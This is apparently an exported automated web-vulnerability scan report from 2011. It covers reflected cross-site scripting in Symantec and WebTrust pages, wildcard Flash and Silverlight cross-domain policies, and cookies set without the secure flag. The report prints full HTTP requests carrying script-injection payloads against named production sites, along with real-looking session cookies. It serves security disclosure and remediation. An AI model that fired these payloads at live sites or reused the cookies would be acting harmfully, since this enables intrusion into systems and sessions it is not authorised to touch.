<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect2/images/favicon.icobe710'-alert(1)-'6137fcbfa0a';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

3.34. http://www.symantec.com/s/searchg/suggest [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /s/searchg/suggest

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 6b734<script>alert(1)</script>b1904ad5262 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /s/searchg/suggest?q=xss6b734<script>alert(1)</script>b1904ad5262&max=10&site=symc_en_US&client=symc_en_US&access=p&format=rich HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622023420-New%7C1336358023420%3B%20event69%3Devent69%7C1336358023421%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Content-Length: 73
Expires: Fri, 09 Sep 2011 21:33:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 09 Sep 2011 21:33:43 GMT
Connection: close
Vary: Accept-Encoding

{ "query":"xss6b734<script>alert(1)</script>b1904ad5262", "results": [] }

3.35. https://cert.webtrust.org/ViewSeal [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://cert.webtrust.org
Path:   /ViewSeal

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 3e394<script>alert(1)</script>ae07fae4fa3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /ViewSeal?id=304 HTTP/1.1
Host: cert.webtrust.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=3e394<script>alert(1)</script>ae07fae4fa3

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 20:14:37 GMT
Server: Apache Tomcat/4.0.6 (HTTP/1.1 Connector)
X-Cache: MISS from cert.webtrust.org
Connection: close
Content-Type: text/html
Content-Length: 258

<html>
<head>
<title>Web Trust</title>
<link rel="stylesheet" href="/admin.css" type="text/css">
</head>
<body>
Invalid domain [http://www.google.com/search?hl=en&q=3e394<script>alert(1)</script>ae07fae4fa3]: please contact your practitioner.</body>
...[SNIP]...

4. Flash cross-domain policy  previous  next
There are 18 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://ak.c.ooyala.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ak.c.ooyala.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ak.c.ooyala.com

Response

HTTP/1.0 200 OK
x-amz-id-2: KN3pSbRmPOnrtBbaZkJNn0JMK9l3niD957+u/ulcUqm9Ba/xmDtCsu4+ok1rK7GJ
x-amz-request-id: 46F7B2194FCF4B8A
Last-Modified: Mon, 12 Jan 2009 21:58:46 GMT
ETag: "124fa42a56284acbe74862f0024af4f3"
Content-Type: text/x-cross-domain-policy
Content-Length: 157
Server: AmazonS3
Cache-Control: max-age=604800
Date: Fri, 09 Sep 2011 21:26:10 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

4.2. http://cp76677.edgefcs.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cp76677.edgefcs.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: cp76677.edgefcs.net
Proxy-Connection: keep-alive
Referer: http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: Keep-Alive
Content-Length: 187
Server: FlashCom/3.5.6
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>

4.3. http://mbox3.offermatica.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mbox3.offermatica.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: mbox3.offermatica.com

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Fri, 09 Sep 2011 21:24:35 GMT
Accept-Ranges: bytes
ETag: W/"201-1315435999000"
Connection: close
Last-Modified: Wed, 07 Sep 2011 22:53:19 GMT
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

4.4. http://om.symantec.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://om.symantec.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: om.symantec.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:11 GMT
Server: Omniture DC/2.0.0
xserver: www500
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.5. http://player.ooyala.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://player.ooyala.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: player.ooyala.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 06 Sep 2011 23:02:21 GMT
X-Ooyala-Server-Id: i-2a1c3f45
Content-Type: text/x-cross-domain-policy
Cache-Control: public, max-age=3600
Date: Fri, 09 Sep 2011 21:26:10 GMT
Content-Length: 319
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.6. https://symantec-corporation.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://symantec-corporation.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: symantec-corporation.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:34:30 GMT
Server: Apache
Last-Modified: Wed, 19 May 2010 01:45:45 GMT
ETag: "4500fc-148-486e89dcf8440"
Accept-Ranges: bytes
Content-Length: 328
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<!--
Policy file for Responsys, Inc.

Last edit $Date: 2010-05-18 18:42:54
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

4.7. http://symantec.tt.omtrdc.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://symantec.tt.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: symantec.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Fri, 09 Sep 2011 21:30:59 GMT
Accept-Ranges: bytes
ETag: W/"201-1315435999000"
Connection: close
Last-Modified: Wed, 07 Sep 2011 22:53:19 GMT
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

4.8. http://ch.norton.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ch.norton.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ch.norton.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Length: 436
Last-Modified: Thu, 07 Oct 2010 22:54:56 GMT
ETag: "1b4-4cae4fc0"
Accept-Ranges: bytes
Content-Type: text/xml;charset=UTF-8
Cache-Control: public, max-age=3600
Date: Fri, 09 Sep 2011 21:41:25 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!--File added for Flash apps-->
<cross-domain-policy>
<allow-access-from domain="*.symantec.com"/>
<allow-access-from domain="*.norton.com"/>
<allow-access-from domain="*.symantecstore.com"/>
<allow-access-from domain="*.nortonopscenter.com"/>
<allow-access-from domain="*.brightcove.com"/>
...[SNIP]...

4.9. http://l.player.ooyala.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://l.player.ooyala.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.1
Host: l.player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Fri, 09 Sep 2011 21:26:09 GMT
Content-Type: text/x-cross-domain-policy
Connection: close
Cache-Control: max-age=3600, private
Content-Length: 330

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*.ooyala.com" />
...[SNIP]...

4.10. http://us.norton.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://us.norton.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: us.norton.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Length: 436
Last-Modified: Thu, 07 Oct 2010 22:54:56 GMT
ETag: "1b4-4cae4fc0"
Accept-Ranges: bytes
Content-Type: text/xml
Cache-Control: public, max-age=2748
Date: Fri, 09 Sep 2011 21:30:57 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!--File added for Flash apps-->
<cross-domain-policy>
<allow-access-from domain="*.symantec.com"/>
<allow-access-from domain="*.norton.com"/>
<allow-access-from domain="*.symantecstore.com"/>
<allow-access-from domain="*.nortonopscenter.com"/>
<allow-access-from domain="*.brightcove.com"/>
...[SNIP]...

4.11. https://us.norton.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://us.norton.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: us.norton.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Length: 436
Last-Modified: Thu, 07 Oct 2010 22:54:56 GMT
ETag: "1b4-4cae4fc0"
Accept-Ranges: bytes
Content-Type: text/xml
Date: Fri, 09 Sep 2011 21:47:32 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!--File added for Flash apps-->
<cross-domain-policy>
<allow-access-from domain="*.symantec.com"/>
<allow-access-from domain="*.norton.com"/>
<allow-access-from domain="*.symantecstore.com"/>
<allow-access-from domain="*.nortonopscenter.com"/>
<allow-access-from domain="*.brightcove.com"/>
...[SNIP]...

4.12. https://www-secure.symantec.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www-secure.symantec.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www-secure.symantec.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Tue, 17 Nov 2009 23:34:35 GMT
ETag: "22a-4b03330b"
Content-Type: text/xml
Date: Fri, 09 Sep 2011 21:47:32 GMT
Content-Length: 554
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!--File added for Flash apps-->
<cross-domain-policy>
<allow-access-from domain="*.symantec.com"/>
<allow-access-from domain="*.norton.com"/>
<allow-access-from domain="*.symantecstore.com"/>
<allow-access-from domain="*.nortonopscenter.com"/>
<allow-access-from domain="*.securityprofessional.com"/>
<allow-access-from domain="*.securitydash.com"/>
<allow-access-from domain="*.brightcove.com"/>
...[SNIP]...

4.13. http://www.symantec.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.symantec.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Tue, 17 Nov 2009 23:34:35 GMT
ETag: "22a-4b03330b"
Content-Type: text/xml
Cache-Control: public, max-age=2498
Date: Fri, 09 Sep 2011 21:26:10 GMT
Content-Length: 554
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!--File added for Flash apps-->
<cross-domain-policy>
<allow-access-from domain="*.symantec.com"/>
<allow-access-from domain="*.norton.com"/>
<allow-access-from domain="*.symantecstore.com"/>
<allow-access-from domain="*.nortonopscenter.com"/>
<allow-access-from domain="*.securityprofessional.com"/>
<allow-access-from domain="*.securitydash.com"/>
<allow-access-from domain="*.brightcove.com"/>
...[SNIP]...

4.14. http://1168.ic-live.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://1168.ic-live.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: 1168.ic-live.com

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
Last-Modified: Thu, 17 Mar 2011 17:54:57 GMT
ETag: "8045c-1c8-49eb15c03de40"
Accept-Ranges: bytes
Content-Length: 456
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="/w3c/p3p.xml"
Content-Type: text/xml
X-Cache: MISS from i2a-coll-20
X-Cache-Lookup: MISS from i2a-coll-20:80
Via: 1.0 i2a-coll-20:80 (squid/2.6.STABLE21)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="ecdev1.avery.com" secure="false" />
...[SNIP]...
<allow-access-from domain="ecdev1.averysignaturebinders.com" secure="false" />
...[SNIP]...
<allow-access-from domain="www.averysignaturebinders.com" secure="false" />
...[SNIP]...

4.15. https://drh.img.digitalriver.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://drh.img.digitalriver.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: drh.img.digitalriver.com

Response

HTTP/1.0 200 OK
ETag: "da-4ae73ece"
Content-Type: text/xml
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=66808035819,0)
Last-Modified: Tue, 27 Oct 2009 18:41:18 GMT
Content-Length: 218
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app72
Accept-Ranges: bytes
Date: Fri, 09 Sep 2011 21:41:50 GMT
Connection: close

<?xml version="1.0"?>
<!-- http://www.adobe.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="gc.digitalriver.com" />
<allow-access-from domain="cx.digitalriver.com" />
</cr
...[SNIP]...

4.16. http://twitter.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 22:05:29 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 18:09:12 GMT
Accept-Ranges: bytes
Content-Length: 561
Cache-Control: max-age=1800
Expires: Fri, 09 Sep 2011 22:35:29 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<al
...[SNIP]...
<allow-access-from domain="api.twitter.com" />
   <allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

4.17. http://www.verisign.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.verisign.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:24:38 GMT
Server: Apache
Last-Modified: Wed, 19 Jan 2011 20:36:58 GMT
Accept-Ranges: bytes
Content-Length: 213
Expires: Sun, 09 Oct 2011 21:24:38 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="cdn.verisign.com"/>
</cross-d
...[SNIP]...

4.18. https://www.verisign.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.verisign.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.verisign.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:45 GMT
Server: Apache
Last-Modified: Wed, 19 Jan 2011 20:36:58 GMT
Accept-Ranges: bytes
Content-Length: 213
Expires: Sun, 09 Oct 2011 21:27:45 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="cdn.verisign.com"/>
</cross-d
...[SNIP]...

5. Silverlight cross-domain policy  previous  next
There are 2 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://om.symantec.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://om.symantec.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: om.symantec.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:11 GMT
Server: Omniture DC/2.0.0
xserver: www627
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.2. http://player.ooyala.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://player.ooyala.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: player.ooyala.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 03 Aug 2011 01:50:51 GMT
X-Ooyala-Server-Id: i-78a24c19
Content-Type: text/xml
Date: Fri, 09 Sep 2011 21:26:10 GMT
Content-Length: 362
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-methods="*" http-request-headers="*">
<domain uri="*"/>
</allow-fr
...[SNIP]...

6. SSL cookie without secure flag set  previous  next
There are 67 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


6.1. https://admin.instantservice.com/Customer  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://admin.instantservice.com
Path:   /Customer

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Customer HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:36:51 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: JSESSIONID=9A45BF0A3BE120A9EF79A1A51006FFFF; Path=/isservices
Location: https://admin.instantservice.com/customerclient_error.html?null
Content-Length: 0
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: User-Agent,Accept-Encoding
